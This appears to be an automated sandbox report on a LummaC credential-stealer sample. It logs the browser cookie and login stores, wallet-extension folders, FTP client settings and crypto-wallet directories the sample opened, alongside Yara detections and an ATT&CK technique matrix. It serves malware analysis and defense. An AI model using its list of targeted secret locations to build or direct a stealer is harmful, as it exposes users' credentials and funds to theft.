Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B4A1.tmp.exe PID: 7460, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: B4A1.tmp.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02551B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02551B33
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02550E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02550E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	4 Obfuscated Files or Information	LSASS Memory	21 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	22 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

